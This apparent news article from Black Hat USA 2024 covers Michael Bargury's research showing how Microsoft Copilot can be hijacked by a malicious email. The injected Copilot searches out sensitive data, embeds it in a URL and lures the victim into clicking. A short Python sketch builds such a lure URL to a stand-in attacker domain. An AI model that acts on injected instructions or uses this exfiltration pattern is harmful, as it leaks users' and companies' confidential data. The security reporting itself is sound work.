Black Hat USA 2024: Microsoft’s Copilot is freaking some researchers out

There’s a black box problem with AI. If you aren’t really sure how it makes decisions, how can you protect your data? As we attend Black Hat USA 2024, we dig deeper into the problem.

Despite Microsoft’s claims that its AI tools are secure, cybersecurity researcher Michael Bargury demonstrated how Copilot Studio, which lets companies build their own AI assistants, can easily be abused to exfiltrate sensitive enterprise data. We met with Bargury during the Black Hat conference to learn more.

“Microsoft is trying, but if we are honest here, we don't know how to build secure AI applications,” he said.

His view is that Microsoft will fix vulnerabilities and bugs as they arise, which means that companies using its products in the meantime do so at their own risk.

“The thing that's interesting about AI is that you don't see many cases where enterprises are adopting new technologies in six months. It doesn't happen. It didn't happen exactly. But now, Microsoft is just pushing every major bank [to implement AI]. This is why this is so scary,” Bargury added.

While Microsoft is surely working on many security mechanisms, experts like Bargury point out that customers lack “observability,” meaning they don’t really know what Copilot is doing on their behalf.

This creates a black box problem with AI.

“You go to Copilot and look for an architecture picture, and you get this nice little caricature thing, but nobody's telling you what the orchestrator does on your behalf. How are decisions being made? Who's making what decision? It's all obscure from you because it's their thing, and they're going to secure it. So of course it's really difficult to secure,” Bargury said.

Because it’s so opaque, he and his team reverse engineered Copilot, hoping to map all of its defense mechanisms. They found 10 different security mechanisms, but that doesn’t really matter, because “Copilot can read so much sensitive information, it becomes very vulnerable.” They also discovered 15 different ways to break Copilot.

During the conference, Bargury showcased how attackers can abuse Copilot for Microsoft 365 to manipulate a financial transaction.

“By sending a malicious email, an attacker takes over Copilot remotely and gets it to act as a malicious insider. Copilot searches for sensitive data, embeds that data in the choice of a URL, and lures the victim to click the URL thus exfiltrating the data to the attacker.”
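
To make the mechanics concrete, here is a minimal Python sketch of that URL-based exfiltration pattern, not Bargury’s actual exploit: the domain and helper names (attacker-controlled.example, build_lure_url) are hypothetical, and the point is simply that sensitive text can ride along in a link’s query string and be read back out of the attacker’s request logs.

```python
# Hypothetical sketch of data exfiltration via a lure URL.
# Nothing here is Bargury's code; the names and domain are invented.
from urllib.parse import urlencode, urlparse, parse_qs

def build_lure_url(sensitive_data: str) -> str:
    """Embed stolen data in the query string of a link the victim is lured to click."""
    # A hijacked assistant could render this as a harmless-looking "reference" link.
    return "https://attacker-controlled.example/doc?" + urlencode({"ref": sensitive_data})

def attacker_recovers(url: str) -> str:
    """Server-side, the data arrives with the HTTP request and sits in the access logs."""
    return parse_qs(urlparse(url).query)["ref"][0]

secret = "wire to IBAN DE89 3704 0044 0532 0130 00"  # data the assistant was tricked into fetching
lure = build_lure_url(secret)
print(lure)  # the innocuous-looking link shown to the victim
assert attacker_recovers(lure) == secret
```

Notably, no malware ever runs on the victim’s machine: a single click on a plausible-looking link is enough to hand the data over.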

Worried enterprises can, of course, opt out of using Copilot. However, according to Bargury, opting out of AI altogether is not an option.

“You'll get it somewhere else. It will be baked into your products,” he added.